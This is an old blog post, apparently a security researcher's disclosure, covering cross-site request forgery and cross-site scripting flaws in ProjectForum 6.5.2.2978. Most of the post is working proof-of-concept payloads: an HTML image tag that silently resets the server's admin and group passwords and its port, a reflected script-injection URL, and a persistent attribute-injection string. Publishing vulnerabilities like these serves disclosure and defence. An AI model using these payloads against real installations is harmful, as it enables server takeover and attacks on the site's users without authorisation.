This site is soon to be deprecated by http://www.johnleitch.net

Thursday, May 13, 2010

ProjectForum 6.5.2.2978 XSRF / XSS

A cross-site request forgery vunlerability in ProjectForum 6.5.2.2978 can be exploited to reconfigure the server (e.g. admin password, create group password, port) with a malicious GET request.

PoC:
<html>
<body>
<img src="http://localhost/admin/site.html?adminpasswd=new_password&adminpasswd2=new_password&port=80&theme=default&createpasswd=new_password&createpasswd2=new_password&action=Save+Changes&formSubmitted=1" />
</body>
</html>



Several reflected and persistent cross-site scripting vulnerabilities are present.

PoC:
Reflected:
http://localhost/1/admin/newpage.html?name=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

Persistent:
Edit a page and add the following
http://"onmouseover="alert(0)"style="position:absolute;top:0;left:0;width:9999px;height:9999px;

No comments:

Post a Comment